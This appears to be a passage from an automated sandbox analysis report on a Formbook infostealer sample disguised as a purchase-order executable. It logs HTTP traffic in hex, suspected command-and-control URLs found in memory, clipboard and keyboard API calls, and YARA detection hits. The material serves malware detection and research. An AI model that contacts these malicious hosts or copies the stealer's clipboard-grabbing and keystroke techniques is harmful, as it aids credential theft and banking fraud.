38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:32:53 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:32:55 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:33:10 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:33:12 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:33:15 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:33:17 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:33:23 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: WwOlfblnYaWmLq.exe, 00000006.00000002.4511569074.00000000053E6000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.070001350.xyz
            Source: WwOlfblnYaWmLq.exe, 00000006.00000002.4511569074.00000000053E6000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.070001350.xyz/ivyl/
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RMActivate_ssp.exe, 00000005.00000002.4510222204.0000000004342000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000003E12000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_des
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RMActivate_ssp.exe, 00000005.00000003.2511873644.0000000007544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RMActivate_ssp.exe, 00000005.00000002.4510222204.0000000004CAE000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.000000000477E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.capbear.net/ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy
            Source: WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000004910000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.drupal.org)
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: RMActivate_ssp.exe, 00000005.00000002.4510222204.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000003C80000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.mfgamecompany.shop/lwt6/?bX=j/d5AuZ
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001CEAFF
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001CED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_001CED6A
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001CEAFF
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_001BAA57
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001E9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_001E9576

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: PO2-2401-0016 (TR).exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO2-2401-0016 (TR).exe, 00000000.00000000.2048420548.0000000000212000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO2-2401-0016 (TR).exe, 00000000.00000000.2048420548.0000000000212000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
            Source: PO2-2401-0016 (TR).exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO2-2401-0016 (TR).exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is 